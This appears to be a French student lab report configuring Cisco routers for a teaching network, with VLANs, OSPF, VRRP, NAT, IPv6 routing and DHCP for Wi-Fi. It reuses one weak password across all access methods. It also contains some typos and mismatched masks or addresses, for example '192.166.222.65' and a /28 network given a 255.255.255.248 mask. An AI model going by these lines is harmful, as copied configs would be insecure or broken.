- Plan d'adressage
- Architecture réseau
- Configuration des équipements réseau
- Configuration de base
- Configuration du VLAN 110
- Configuration du VLAN 530
- Paramétrage du routage IPv4 OSPF
- Redondance des routeurs via le protocole VRRP
- Translation NAT statique
- Configuration de l'accès Internet de secours
- Paramétrage IPv6
- Configuration du VLAN 164
- Configuration des points d'accès Wifi
- Machine virtuelle sur le serveur Capbreton
- Tests d'intrusion
- Résumé des séances
- Répartition des réseaux :
Groupe | Élève | Domaine | 193.48.57.160/28 | 10.60.0.0/16 | 2001:660:4401:60A0::/60 | 2001:7A8:116E:60A0::/60 | VLAN | N° VRRP | SSID n°1 | SSID n°2 |
---|---|---|---|---|---|---|---|---|---|---|
1 | Basile.Cougnacq | barbiegirl.store | 193.48.57.161 | 10.60.161.0/24 | 2001:660:4401:60A1::/64 | 2001:7A8:116E:60A1::/64 | 161 | 61 | BG1 | BG2 |
2 | Benoit.Bouckaert | zelda-botw.site | 193.48.57.162 | 10.60.162.0/24 | 2001:660:4401:60A2::/64 | 2001:7A8:116E:60A2::/64 | 162 | 62 | ZELDA_BOTW_1 | ZELDA_BOTW_2 |
3 | God-Belange.Aradukunda | humankind59.site | 193.48.57.163 | 10.60.163.0/2 | 2001:660:4401:60A3::/64 | 2001:7A8:116E:60A3::/64 | 163 | 63 | Humankind1 | Humankind2 |
4 | Kevin.Doolaeghe | demineur.site | 193.48.57.164 | 10.60.164.0/24 | 2001:660:4401:60A4::/64 | 2001:7A8:116E:60A4::/64 | 164 | 64 | DEMINEUR1 | DEMINEUR2 |
5 | Lea.Viciot | animal-crossing.site | 193.48.57.165 | 10.60.165.0/24 | 2001:660:4401:60A5::/64 | 2001:7A8:116E:60A5::/64 | 165 | 65 | AnimalCrossing1 | AnimalCrossing2 |
6 | Nicolas.Erceau | rocketleague.club | 193.48.57.166 | 10.60.166.0/24 | 2001:660:4401:60A6::/64 | 2001:7A8:116E:60A6::/64 | 166 | 66 | Rocket-League-1 | Rocket-League-2 |
7 | Quentin.Lemaire | gta59.site | 193.48.57.167 | 10.60.167.0/24 | 2001:660:4401:60A7::/64 | 2001:7A8:116E:60A7::/64 | 167 | 67 | GTA1 | GTA2 |
8 | Quentin.Maesen | fifa59.site | 193.48.57.168 | 10.60.168.0/24 | 2001:660:4401:60A8::/64 | 2001:7A8:116E:60A8::/64 | 168 | 68 | Fifa1 | Fifa2 |
9 | Romain.Haye | brawl-stars.club | 193.48.57.169 | 10.60.169.0/24 | 2001:660:4401:60A9::/64 | 2001:7A8:116E:60A9::/64 | 169 | 69 | Brawl-Stars-1 | Brawl-Stars-2 |
10 | Thomas.Obled | warzone59.site | 193.48.57.170 | 10.60.170.0/24 | 2001:660:4401:60AA::/64 | 2001:7A8:116E:60AA::/64 | 170 | 70 | WARZONE1 | WARZONE2 |
11 | Valentin.Harlet | mario59.site | 193.48.57.171 | 10.60.171.0/24 | 2001:660:4401:60AB::/64 | 2001:7A8:116E:60AB::/64 | 171 | 71 | Mario1 | Mario2 |
12 | William.Meslard | bffield.store | 193.48.57.172 | 10.60.172.0/24 | 2001:660:4401:60AC::/64 | 2001:7A8:116E:60AC::/64 | 172 | 72 | BATTLEFIELD1 | BATTLEFIELD2 |
13 | Yasmine.Haloua | toad59.site | 193.48.57.173 | 10.60.173.0/24 | 2001:660:4401:60AD::/64 | 2001:7A8:116E:60AD::/64 | 173 | 73 | Toad1 | Toad2 |
- Plan d'adressage IPv4 :
VLAN | Nom | Réseau IPv4 | Cisco 6509-E | Cisco 9200 | Cisco ISR 4331 | Routeur plateforme maths/info |
---|---|---|---|---|---|---|
110 | TP-NET1 | 193.48.57.160/28 / 10.60.100.0/24 (local) | 10.60.100.1 | 10.60.100.2 | 10.60.100.3 | - |
530 | INTERCO-4A | 192.168.222.64/28 | 192.168.222.66 | 192.168.222.67 | - | 192.168.222.65 |
532 | INTERCO-1B | 192.168.222.80/28 | - | - | 192.168.222.82 | 192.168.222.81 |
161 | BarbieGirl | 10.60.161.0/24 | 10.60.161.1 | 10.60.161.2 | - | - |
162 | Zelda-BOTW | 10.60.162.0/24 | 10.60.162.1 | 10.60.162.2 | - | - |
163 | Humankind | 10.60.163.0/24 | 10.60.163.1 | 10.60.163.2 | - | - |
164 | DEMINEUR | 10.60.164.0/24 | 10.60.164.1 | 10.60.164.2 | - | - |
165 | AnimalCrossing | 10.60.165.0/24 | 10.60.165.1 | 10.60.165.2 | - | - |
166 | Rocket-League | 10.60.166.0/24 | 10.60.166.1 | 10.60.166.2 | - | - |
167 | GTA | 10.60.167.0/24 | 10.60.167.1 | 10.60.167.2 | - | - |
168 | Fifa | 10.60.168.0/24 | 10.60.168.1 | 10.60.168.2 | - | - |
169 | Brawl-Stars | 10.60.169.0/24 | 10.60.169.1 | 10.60.169.2 | - | - |
170 | Warzone | 10.60.170.0/24 | 10.60.170.1 | 10.60.170.2 | - | - |
171 | Mario | 10.60.171.0/24 | 10.60.171.1 | 10.60.171.2 | - | - |
172 | Battlefield | 10.60.172.0/24 | 10.60.172.1 | 10.60.172.2 | - | - |
173 | Toad | 10.60.173.0/24 | 10.60.173.1 | 10.60.173.2 | - | - |
- Plan d'adressage IPv6 :
VLAN | Nom | Réseau IPv6 | Cisco 6509-E | Cisco 9200 | Cisco ISR 4331 | Routeur plateforme maths/info |
---|---|---|---|---|---|---|
110 | TP-NET1 | 2001:660:4401:60A0::/64 | - | - | - | - |
530 | INTERCO-4A | FE80::/10 | FE80::2 | FE80::3 | - | FE80::1 |
532 | INTERCO-1B | FE80::/10 | - | - | FE80::2 | FE80::1 |
161 | BarbieGirl | 2001:660:4401:60A1::/64 / 2001:7A8:116E:60A1::/64 | - | - | - | - |
162 | Zelda-BOTW | 2001:660:4401:60A2::/64 / 2001:7A8:116E:60A2::/64 | - | - | - | - |
163 | Humankind | 2001:660:4401:60A3::/64 / 2001:7A8:116E:60A3::/64 | - | - | - | - |
164 | DEMINEUR | 2001:660:4401:60A4::/64 / 2001:7A8:116E:60A4::/64 | - | - | - | - |
165 | AnimalCrossing | 2001:660:4401:60A5::/64 / 2001:7A8:116E:60A5::/64 | - | - | - | - |
166 | Rocket-League | 2001:660:4401:60A6::/64 / 2001:7A8:116E:60A6::/64 | - | - | - | - |
167 | GTA | 2001:660:4401:60A7::/64 / 2001:7A8:116E:60A7::/64 | - | - | - | - |
168 | Fifa | 2001:660:4401:60A8::/64 / 2001:7A8:116E:60A8::/64 | - | - | - | - |
169 | Brawl-Stars | 2001:660:4401:60A9::/64 / 2001:7A8:116E:60A9::/64 | - | - | - | - |
170 | Warzone | 2001:660:4401:60AA::/64 / 2001:7A8:116E:60AA::/64 | - | - | - | - |
171 | Mario | 2001:660:4401:60AB::/64 / 2001:7A8:116E:60AB::/64 | - | - | - | - |
172 | Battlefield | 2001:660:4401:60AC::/64 / 2001:7A8:116E:60AC::/64 | - | - | - | - |
173 | Toad | 2001:660:4401:60AD::/64 / 2001:7A8:116E:60AD::/64 | - | - | - | - |
- Architecture logique :
- Architecture physique :
switch>enable
switch#configure terminal
- Configuration du nom d’hôte :
switch(config)#hostname SE2A5-R1
- Accès SSH :
SE2A5-R1(config)#aaa new-model
SE2A5-R1(config)#username admin privilege 15 secret glopglop
SE2A5-R1(config)#ip domain-name plil.info
SE2A5-R1(config)#crypto key generate rsa
SE2A5-R1(config)#line vty 0 15
SE2A5-R1(config-line)#transport input ssh
SE2A5-R1(config-line)#exit
- Accès console :
SE2A5-R1(config)#line console 0
SE2A5-R1(config-line)#password glopglop
SE2A5-R1(config-line)#login authentification default
SE2A5-R1(config-line)#exit
- Sécurisation des accès :
SE2A5-R1(config)#service password-encryption
SE2A5-R1(config)#enable secret glopglop
SE2A5-R1(config)#banner motd #Restricted Access#
- Activer le routage :
SE2A5-R1(config)#ip routing
- Activer VRRP :
SE2A5-R1(config)#license boot level network-advantage
SE2A5-R1(config)#fhrp version vrrp v3
switch>enable
switch#configure terminal
- Configuration du nom d’hôte :
switch(config)#hostname SE2A5-R2
- Accès SSH :
SE2A5-R2(config)#aaa new-model
SE2A5-R2(config)#username admin privilege 15 secret glopglop
SE2A5-R2(config)#ip domain-name plil.info
SE2A5-R2(config)#crypto key generate rsa
SE2A5-R2(config)#line vty 0 15
SE2A5-R2(config-line)#transport input ssh
SE2A5-R2(config-line)#exit
- Accès console :
SE2A5-R2(config)#line console 0
SE2A5-R2(config-line)#password glopglop
SE2A5-R2(config-line)#login authentification default
SE2A5-R2(config-line)#exit
- Sécurisation des accès :
SE2A5-R2(config)#service password-encryption
SE2A5-R2(config)#enable secret glopglop
SE2A5-R2(config)#banner motd #Restricted Access#
- Activer le routage :
SE2A5-R2(config)#ip routing
- Activer VRRP :
SE2A5-R2(config)#license boot level network-advantage
SE2A5-R2(config)#fhrp version vrrp v3
Le VLAN 110 permet un accès à un réseau IPv4 routé.
Le réseau privé 10.60.0.0/16
est également utilisé sur ce réseau pour les points d'accès Wifi et les configurations IP des routeurs.
- VLAN 110 :
SE2A5-R1(config)#vlan 110
SE2A5-R1(config-vlan)#name TP-NET1
SE2A5-R1(config-vlan)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#description TP-NET1
SE2A5-R1(config-if)#ip address 10.60.100.1 255.255.255.0
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
- Interface vers serveur Capbreton :
SE2A5-R1(config)#interface t6/4
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode access
SE2A5-R1(config-if)#switchport access vlan 110
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
- VLAN 110 :
SE2A5-R2(config)#vlan 110
SE2A5-R2(config-vlan)#name TP-NET1
SE2A5-R2(config-vlan)#exit
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#description TP-NET1
SE2A5-R2(config-if)#ip address 10.60.100.2 255.255.255.0
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
- Interface vers serveur Capbreton :
SE2A5-R2(config)#interface t1/1/1
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode access
SE2A5-R2(config-if)#switchport access vlan 110
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
Le VLAN 530 permet l'interconnexion avec les routeurs de la plateforme maths/info.
- VLAN 530 :
SE2A5-R1(config)#vlan 530
SE2A5-R1(config-vlan)#name INTERCO-4A
SE2A5-R1(config-vlan)#exit
SE2A5-R1(config)#interface vlan 530
SE2A5-R1(config-if)#description INTERCO-4A
SE2A5-R1(config-if)#ip address 192.168.222.66 255.255.255.248
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
- Interface d’interconnexion :
SE2A5-R1(config)#interface t6/5
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode access
SE2A5-R1(config-if)#switchport access vlan 530
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
- VLAN 530 :
SE2A5-R2(config)#vlan 530
SE2A5-R2(config-vlan)#name INTERCO-4A
SE2A5-R2(config-vlan)#exit
SE2A5-R2(config)#interface vlan 530
SE2A5-R2(config-if)#description INTERCO-4A
SE2A5-R2(config-if)#ip address 192.168.222.67 255.255.255.248
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
- Interface d’interconnexion :
SE2A5-R2(config)#interface g1/0/1
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode access
SE2A5-R2(config-if)#switchport access vlan 530
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
Le protocole de routage OSPF est utilisé sur le VLAN 530 afin de déterminer quel routeur aura le rôle de maître pour le routage des paquets et l'annonce des routes.
- Routage IPv4 - Protocole OPSF :
SE2A5-R1(config)#router ospf 1
SE2A5-R1(config-router)#router-id 192.168.222.66
SE2A5-R1(config-router)#summary-address 193.48.57.160 255.255.255.240
SE2A5-R1(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
SE2A5-R1(config-router)#redistribute connected subnets metric 1
SE2A5-R1(config-router)#redistribute static subnets metric 1
SE2A5-R1(config-router)#network 192.168.222.64 0.0.0.7 area 10
SE2A5-R1(config-router)#default-information originate
SE2A5-R1(config-router)#exit
- Routage IPv4 - Protocole OPSF :
SE2A5-R2(config)#router ospf 1
SE2A5-R2(config-router)#router-id 192.168.222.67
SE2A5-R2(config-router)#summary-address 193.48.57.160 255.255.255.240
SE2A5-R2(config-router)#summary-address 10.0.0.0 255.0.0.0 not-advertise
SE2A5-R2(config-router)#redistribute connected subnets metric 2
SE2A5-R2(config-router)#redistribute static subnets metric 2
SE2A5-R2(config-router)#network 192.168.222.64 0.0.0.7 area 10
SE2A5-R2(config-router)#default-information originate
SE2A5-R2(config-router)#exit
Le routeur Cisco Catalyst 9200 a une métrique plus élevée afin d'être le routeur secondaire sur le réseau.
Le protocole de redondance VRRP est utilisé pour déterminer quel routeur doit avoir le rôle de maître sur le VLAN 110.
Le routeur Cisco Catalyst 6509-E a une métrique inférieure à celle du Cisco Catalyst 9200 afin qu'il soit le routeur maître sur le réseau.
- VLAN 110 :
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#vrrp 10 ip 10.60.100.254
SE2A5-R1(config-if)#vrrp 10 preempt
SE2A5-R1(config-if)#vrrp 10 priority 110
SE2A5-R1(config-if)#exit
- VLAN 110 :
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
SE2A5-R2(config-if-vrrp)#address 10.60.100.254
SE2A5-R2(config-if-vrrp)#vrrpv2
SE2A5-R2(config-if-vrrp)#priority 100
SE2A5-R2(config-if-vrrp)#preempt
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit
La version 3 du protocole VRRP n'est pas disponible sur le routeur Cisco Catalyst 6509-E.
Cependant, le routeur Cisco Catalyst 9200 utilise cette version par défaut.
La commande vrrpv2
est donc nécessaire afin d'utiliser la version 2 du protocole VRRP.
- Configuration NAT :
SE2A5-R1(config)#interface vlan 530
SE2A5-R1(config-if)#ip nat outside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#ip nat inside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 /28
- Redistribution via OSPF à partir de l'interface Loopback 0 :
SE2A5-R1(config)#interface loopback 0
SE2A5-R1(config-if)#ip address 193.48.57.174 255.255.255.240
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
Les VM doivent avoir une configuration IP sur le réseau 193.48.57.160/28
.
La communication fonctionne désormais sauf pour les paquets UDP qui sont filtrés.
On choisit de désactiver l'interface l0
pour économiser une adresse routée.
A la place, on passe par l'interface null0
:
SE2A5-R1(config)#interface loopback 0
SE2A5-R1(config-if)#shutdown
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#ip route 193.48.57.160 255.255.255.240 null0
Une solution de contournement serait d'utiliser des routes statiques comme pour le routeur Cisco Catalyst 9200 (voir ci-dessous).
Comme le Cisco Catalyst 9200 ne prend pas en charge le protocole NAT, on utilise des routes statiques :
SE2A5-R2(config)#ip route 193.48.57.161 255.255.255.255 10.60.100.161
SE2A5-R2(config)#ip route 193.48.57.162 255.255.255.255 10.60.100.162
SE2A5-R2(config)#ip route 193.48.57.163 255.255.255.255 10.60.100.163
SE2A5-R2(config)#ip route 193.48.57.164 255.255.255.255 10.60.100.164
SE2A5-R2(config)#ip route 193.48.57.165 255.255.255.255 10.60.100.165
SE2A5-R2(config)#ip route 193.48.57.166 255.255.255.255 10.60.100.166
SE2A5-R2(config)#ip route 193.48.57.167 255.255.255.255 10.60.100.167
SE2A5-R2(config)#ip route 193.48.57.168 255.255.255.255 10.60.100.168
SE2A5-R2(config)#ip route 193.48.57.169 255.255.255.255 10.60.100.169
SE2A5-R2(config)#ip route 193.48.57.170 255.255.255.255 10.60.100.170
SE2A5-R2(config)#ip route 193.48.57.171 255.255.255.255 10.60.100.171
SE2A5-R2(config)#ip route 193.48.57.172 255.255.255.255 10.60.100.172
SE2A5-R2(config)#ip route 193.48.57.173 255.255.255.255 10.60.100.173
Cette solution est fonctionnelle mais impose que les VM aient une configuration IP sur le réseau 10.60.100.160/28
.
Les VM devront donc avoir une configuration IP avec l'adresse locale et celle routée.
La liaison entre les routeurs déjà présents et le routeur Cisco ISR 4331 est configurée en mode trunk (802.1q).
On ajoute une règle SLA afin de tester la réponse du routeur de la plateforme maths/info situé en amont.
Si le routeur ne répond pas, on décrémente la métrique des routeurs sur le VLAN 110 afin que le routeur ISR 4331 devienne prioritaire.
- Interface vers Cisco ISR 4331 :
SE2A5-R1(config)#interface t5/5
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode trunk
SE2A5-R1(config-if)#switchport trunk allowed vlan 110
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
- SLA :
SE2A5-R1(config)#ip sla 1
SE2A5-R1(config-ip-sla)#icmp-echo 192.168.222.65
SE2A5-R1(config-ip-sla-echo)#frequency 300
SE2A5-R1(config-ip-sla-echo)#exit
SE2A5-R1(config)#ip sla schedule 1 life forever start-time now
SE2A5-R1(config)#track 1 ip sla 1
SE2A5-R1(config-track)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#vrrp 10 track 1 decrement 50
SE2A5-R1(config-if)#exit
- Interface vers Cisco ISR 4331 :
SE2A5-R2(config)#interface g1/0/2
SE2A5-R2(config-if)#switchport
SE2A5-R2(config-if)#switchport mode trunk
SE2A5-R2(config-if)#switchport trunk allowed vlan 110
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#exit
- SLA :
SE2A5-R2(config)#ip sla 1
SE2A5-R2(config-ip-sla)#icmp-echo 192.166.222.65
SE2A5-R2(config-ip-sla-echo)#frequency 300
SE2A5-R2(config-ip-sla-echo)#exit
SE2A5-R2(config)#ip sla schedule 1 life forever start-time now
SE2A5-R2(config)#track 1 ip sla 1
SE2A5-R2(config-track)#exit
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#vrrp 10 address-family ipv4
SE2A5-R2(config-if-vrrp)#track 1 decrement 50
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit
switch>enable
switch#configure terminal
- Configuration du nom d’hôte :
switch(config)#hostname SE2A5-R3
- Accès SSH :
SE2A5-R3(config)#aaa new-model
SE2A5-R3(config)#username admin privilege 15 secret glopglop
SE2A5-R3(config)#ip domain-name plil.info
SE2A5-R3(config)#crypto key generate rsa
SE2A5-R3(config)#line vty 0 15
SE2A5-R3(config-line)#transport input ssh
SE2A5-R3(config-line)#exit
- Accès console :
SE2A5-R3(config)#line console 0
SE2A5-R3(config-line)#password glopglop
SE2A5-R3(config-line)#login authentification default
SE2A5-R3(config-line)#exit
- Sécurisation des accès :
SE2A5-R3(config)#service password-encryption
SE2A5-R3(config)#enable secret glopglop
SE2A5-R3(config)#banner motd #Restricted Access#
- Activer le routage :
SE2A5-R3(config)#ip routing
- Activer VRRP :
SE2A5-R3(config)#license boot level network-advantage
SE2A5-R3(config)#fhrp version vrrp v3
Le routeur Cisco ISR 4331 ne permet pas la configuration des VLAN. Une alternative à ce problème est de passer par des ponts (BDI) pour remplacer les VLAN 110 et 532.
- Bridge VLAN 110 :
SE2A5-R3(config)#interface bdi 110
SE2A5-R3(config-if)#ip address 10.60.100.3 255.255.255.0
SE2A5-R3(config-if)#vrrp 10 ip 10.60.100.254
SE2A5-R3(config-if)#vrrp 10 preempt
SE2A5-R3(config-if)#vrrp 10 priority 90
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#exit
- Interface vers Cisco Catalyst 6509-E :
SE2A5-R3(config)#interface g0/0/2
SE2A5-R3(config-if)#description TP-NET1
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#service instance 110 ethernet
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
SE2A5-R3(config-if-srv)#bridge-domain 110
SE2A5-R3(config-if-srv)#exit
SE2A5-R3(config-if)#exit
- Interface vers Cisco Catalyst 9200 :
SE2A5-R3(config)#interface g0/0/1
SE2A5-R3(config-if)#description TP-NET1
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#service instance 110 ethernet
SE2A5-R3(config-if-srv)#encapsulation dot1q 110
SE2A5-R3(config-if-srv)#rewrite ingress tag pop 1 symmetric
SE2A5-R3(config-if-srv)#bridge-domain 110
SE2A5-R3(config-if-srv)#exit
SE2A5-R3(config-if)#exit
Le VLAN 532 permet l'interconnexion avec l'accès Internet de secours.
- Bridge VLAN 532 :
SE2A5-R3(config)#interface bdi 532
SE2A5-R3(config-if)#ip address 192.168.222.82 255.255.255.248
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#exit
- Interface d’interconnexion :
SE2A5-R3(config)#interface g0/0/0
SE2A5-R3(config-if)#description INTERCO-1B
SE2A5-R3(config-if)#no shutdown
SE2A5-R3(config-if)#service instance 532 ethernet
SE2A5-R3(config-if-srv)#encapsulation untagged
SE2A5-R3(config-if-srv)#bridge-domain 532
SE2A5-R3(config-if-srv)#exit
SE2A5-R3(config-if)#exit
On configure une mascarade sur l'accès Internet de secours. Pour cela, on utilise l'avant-dernière adresse du réseau routé 213.215.6.96/29
(soit l'adresse IP 213.215.6.101
).
- Configuration NAT :
SE2A5-R3(config)#interface loopback 0
SE2A5-R3(config-if)#ip address 213.215.6.101 255.255.255.255
SE2A5-R3(config-if)#exit
SE2A5-R3(config)#interface bdi 532
SE2A5-R3(config-if)#ip nat outside
SE2A5-R3(config-if)#exit
SE2A5-R3(config)#interface bdi 110
SE2A5-R3(config-if)#ip nat inside
SE2A5-R3(config-if)#exit
SE2A5-R3(config)#access-list 10 permit 193.48.57.160 0.0.0.15
SE2A5-R3(config)#ip nat inside source list 10 interface loopback 0 overload
SE2A5-R3(config)#ip nat inside source static network 10.60.100.160 193.48.57.160 255.255.255.240
Le protocole de routage utilisé pour IPv6 est RIPv6. Le routeur Cisco Catalyst 6509-E possède une métrique plus faible que le routeur Cisco Catalyst 9200 lui permettant de devenir prioritaire pour le routage IPv6.
- Routage IPv6 - Protocole RIPv6 :
SE2A5-R1(config)#ipv6 unicast-routing
SE2A5-R1(config)#ipv6 router rip tpima2a5
SE2A5-R1(config-router)#redistribute connected metric 1
SE2A5-R1(config-router)#redistribute rip 1 metric 1
SE2A5-R1(config-router)#redistribute static metric 1
SE2A5-R1(config-router)#exit
- VLAN 110 :
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
SE2A5-R1(config-if)#ipv6 nd router-preference high
SE2A5-R1(config-if)#ipv6 enable
SE2A5-R1(config-if)#exit
- VLAN 530 :
SE2A5-R1(config)#interface vlan 530
SE2A5-R1(config-if)#ipv6 address fe80::2 link-local
SE2A5-R1(config-if)#ipv6 rip tpima2a5 enable
SE2A5-R1(config-if)#ipv6 enable
- Routage IPv6 - Protocole RIPv6 :
SE2A5-R2(config)#ipv6 unicast-routing
SE2A5-R2(config)#ipv6 router rip tpima2a5
SE2A5-R2(config-router)#redistribute connected metric 2
SE2A5-R2(config-router)#redistribute rip 1 metric 2
SE2A5-R2(config-router)#redistribute static metric 2
SE2A5-R2(config-router)#exit
- VLAN 110 :
SE2A5-R2(config)#interface vlan 110
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
SE2A5-R2(config-if)#ipv6 nd router-preference medium
SE2A5-R2(config-if)#ipv6 enable
SE2A5-R2(config-if)#exit
- VLAN 530 :
SE2A5-R2(config)#interface vlan 530
SE2A5-R2(config-if)#ipv6 address fe80::3 link-local
SE2A5-R2(config-if)#ipv6 rip tpima2a5 enable
SE2A5-R2(config-if)#ipv6 enable
SE2A5-R2(config-if)#exit
- Activer le routage IPv6 :
SE2A5-R3(config)#ipv6 unicast-routing
- Bridge VLAN 110 :
SE2A5-R3(config)#interface bdi 110
SE2A5-R3(config-if)#ipv6 address 2001:660:4401:60a0::/64 eui-64
SE2A5-R3(config-if)#ipv6 nd prefix 2001:660:4401:60a0::/64 1000 900
SE2A5-R3(config-if)#ipv6 nd router-preference low
SE2A5-R3(config-if)#ipv6 enable
SE2A5-R3(config-if)#exit
- Bridge VLAN 532 :
SE2A5-R3(config)#interface bdi 532
SE2A5-R2(config-if)#ipv6 address fe80::2 link-local
SE2A5-R3(config-if)#ipv6 enable
SE2A5-R3(config-if)#exit
Le réseau privé (VLAN 164) est utilisé principalement pour les appareils connectés aux points d'accès Wifi. La plage IPv4 concernée par le VLAN 164 est 10.60.164.0/24
.
- VLAN 164 :
SE2A5-R1(config)#vlan 164
SE2A5-R1(config-vlan)#name DEMINEUR
SE2A5-R1(config-vlan)#exit
SE2A5-R1(config)#interface vlan 164
SE2A5-R1(config-if)#description DEMINEUR
SE2A5-R1(config-if)#ip address 10.60.164.1 255.255.255.0
SE2A5-R1(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
SE2A5-R1(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
SE2A5-R1(config-if)#ipv6 nd router-preference high
SE2A5-R1(config-if)#ipv6 enable
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#vrrp 64 ip 10.60.164.254
SE2A5-R1(config-if)#vrrp 64 preempt
SE2A5-R1(config-if)#vrrp 64 priority 110
SE2A5-R1(config-if)#vrrp 64 track 1 decrement 50
SE2A5-R1(config-if)#exit
- Interface vers Cisco Catalyst 9200 :
SE2A5-R1(config)#interface t5/4
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
SE2A5-R1(config-if)#exit
- Interface vers le point d'accès Wifi :
SE2A5-R1(config)#interface g3/1
SE2A5-R1(config-if)#switchport trunk allowed vlan add 164
SE2A5-R1(config-if)#exit
- DHCP :
SE2A5-R1(config)#ip dhcp pool DEMINEUR
SE2A5-R1(dhcp-config)#dns 193.48.57.164
SE2A5-R1(dhcp-config)#network 10.60.164.0 255.255.255.0
SE2A5-R1(dhcp-config)#default-router 10.60.164.254
SE2A5-R1(dhcp-config)#exit
SE2A5-R1(config)#ip dhcp excluded-address 10.60.164.0 10.60.164.99
SE2A5-R1(config)#ip dhcp excluded-address 10.60.164.150 10.60.164.255
- VLAN 164 :
SE2A5-R2(config)#vlan 164
SE2A5-R2(config-vlan)#name DEMINEUR
SE2A5-R2(config-vlan)#exit
SE2A5-R2(config)#interface vlan 164
SE2A5-R2(config-if)#description DEMINEUR
SE2A5-R2(config-if)#ip address 10.60.164.2 255.255.255.0
SE2A5-R2(config-if)#ipv6 address 2001:660:4401:60a4::/64 eui-64
SE2A5-R2(config-if)#ipv6 nd prefix 2001:660:4401:60a4::/64 1000 900
SE2A5-R2(config-if)#ipv6 nd router-preference medium
SE2A5-R2(config-if)#ipv6 enable
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#vrrp 64 address-family ipv4
SE2A5-R2(config-if-vrrp)#address 10.60.164.254
SE2A5-R2(config-if-vrrp)#priority 100
SE2A5-R2(config-if-vrrp)#preempt
SE2A5-R2(config-if-vrrp)#exit
SE2A5-R2(config-if)#exit
- Interface vers Cisco Catalyst 6509-E :
SE2A5-R2(config)#interface t1/1/2
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
SE2A5-R2(config-if)#exit
- Interface vers le point d'accès Wifi :
SE2A5-R2(config)#interface g1/0/3
SE2A5-R2(config-if)#switchport trunk allowed vlan add 164
SE2A5-R2(config-if)#exit
- DHCP :
SE2A5-R2(config)#ip dhcp pool DEMINEUR
SE2A5-R2(dhcp-config)#dns 193.48.57.164
SE2A5-R2(dhcp-config)#network 10.60.164.0 255.255.255.0
SE2A5-R2(dhcp-config)#default-router 10.60.164.254
SE2A5-R2(dhcp-config)#exit
SE2A5-R2(config)#ip dhcp excluded-address 10.60.164.0 10.60.164.149
SE2A5-R2(config)#ip dhcp excluded-address 10.60.164.200 10.60.164.255
- VLAN n°1 :
SE2A5-R1(config)#interface vlan 1
SE2A5-R1(config-if)#ip address 10.60.101.252 255.255.255.0
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#vrrp 1 ip 10.60.101.254
SE2A5-R1(config-if)#vrrp 1 preempt
SE2A5-R1(config-if)#vrrp 1 priority 110
SE2A5-R1(config-if)#exit
- Interface vers le point d'accès Wifi :
SE2A5-R1(config)#interface g3/1
SE2A5-R1(config-if)#switchport
SE2A5-R1(config-if)#switchport mode trunk
SE2A5-R1(config-if)#switchport trunk allowed vlan add 1
SE2A5-R1(config-if)#no shutdown
SE2A5-R1(config-if)#exit
- NAT PAT :
SE2A5-R1(config)#access-list 164 permit ip 10.60.164.0 0.0.0.255 any
SE2A5-R1(config)#interface vlan 164
SE2A5-R1(config-if)#ip nat inside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#interface vlan 110
SE2A5-R1(config-if)#ip nat outside
SE2A5-R1(config-if)#exit
SE2A5-R1(config)#ip nat inside source list 164 interface t6/4 overload
- VLAN n°1 :
SE2A5-R2(config)#interface vlan 1
SE2A5-R2(config-if)#ip address 10.60.101.253 255.255.255.0
SE2A5-R2(config-if)#no shutdown
SE2A5-R2(config-if)#vrrp 1 address-family ipv4
SE2A5-R2(config-if-vrrp)#address 10.60.101.254
SE2A5-R2(config-if-vrrp)#vrrpv2
SE2A5-R2(config-if-vrrp)#priority 100
